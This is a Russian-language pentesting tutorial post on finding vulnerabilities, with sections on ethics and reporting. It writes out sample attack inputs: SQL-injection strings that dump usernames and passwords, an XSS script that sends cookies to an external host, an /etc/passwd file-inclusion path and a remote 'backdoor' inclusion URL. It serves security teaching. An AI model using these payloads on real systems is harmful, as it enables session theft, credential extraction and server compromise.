💥Активная фаза: выявление уязвимостей

После сбора данных начинается поиск уязвимостей. Используемые инструменты зависят от типа системы.

OWASP ZAP — инструмент для автоматического тестирования веб-приложений. Он выявляет уязвимости, такие как XSS (межсайтовый скриптинг), SQL-инъекции и некорректные заголовки безопасности.

Burp Suite — инструмент для ручного анализа. Позволяет перехватывать HTTP-запросы, модифицировать их, тестировать управление сессиями и логику приложения. Подходит для сложных систем.

Nikto — сканер веб-серверов. Проверяет устаревшее ПО, открытые административные панели, некорректные настройки, такие как отсутствие заголовков безопасности.

Автоматизированные инструменты ограничены известными шаблонами уязвимостей. Ручной анализ необходим для выявления нестандартных проблем: ошибок в обработке данных, слабых механизмов авторизации или уязвимостей в логике приложения.

❗️Уязвимости: примеры и тесты

SQL-инъекция — атака на базы данных через некорректную обработку пользовательского ввода.

Ввод

' OR 1=1 --

проверяет возможность обхода авторизации, добавляя условие, всегда возвращающее истинный результат. Комментарий

--

отключает остальную часть запроса.

Для СУБД Oracle используется

/ /

. Для извлечения данных:

' UNION SELECT username, password FROM users --

, где

UNION

объединяет результат с основным запросом. Число колонок в

UNION

должно совпадать с числом колонок в исходном запросе.

XSS (межсайтовый скриптинг) — внедрение вредоносного кода в веб-страницу.

Тест

<script>alert('XSS')</script>

проверяет, выполняется ли код в браузере.

Если срабатывает, возможна кража сессий через

<script>fetch('https://x.logsheets.net/cookie?' + document.cookie)</script>

, отправляющее cookie на внешний сервер, или перенаправление пользователей.

LFI (Local File Inclusion) — доступ к локальным файлам сервера.

Запрос

?file=../../../../etc/passwd

пытается извлечь системный файл

/etc/passwd

. Успех возможен при отсутствии ограничений, таких как настройка

open_basedir

.

RFI (Remote File Inclusion) — включение внешнего файла. Запрос

?template=https://x.logsheets.net/backdoor.txt

загружает вредный код, если настройка

allow_url_include

активна. Это редкость, но встречается в тестовых средах.

Каждая уязвимость подтверждается доказательствами: командами, логами, скриншотами.

Например, SQL-инъекция должна показать извлечённые данные, XSS — перехваченные cookie.

🤫Этика: соблюдение границ

Пентест проводится строго в рамках договора с заказчиком. Все действия документируются и воспроизводимы.

Эксплуатация уязвимостей служит только для оценки риска, а не для нанесения вреда. Нарушение границ делает тестирование незаконным.

🪧Отчёт: результат тестирования

Отчёт фиксирует процесс и результаты: какие системы тестировались, какие методы применялись, какие уязвимости обнаружены, как их воспроизвести, как устранить.

Рекомендации конкретны: не «обновите ПО», а «установите Apache 2.4.58 для устранения CVE-2023-5043». Логи, скриншоты и команды подтверждают выводы.

CVSS (Common Vulnerability Scoring System) — система оценки рисков. Оценка 9.8 указывает на уязвимость, позволяющую удалённый доступ без авторизации.

Оценка 4.3 — на локальную проблему с ограниченным воздействием. Это помогает расставить приоритеты.

☠️ Итог: защита через тестирование

Пентест элемент системы безопасности. Уязвимости ищут постоянно, и цель — обнаружить их первыми.

🤔 Тщательная подготовка, методичный подход и практика повышают защищённость систем.

#пентест #кибербезопасность #инфобез #безопасностьсети #уязвимости #этика #IT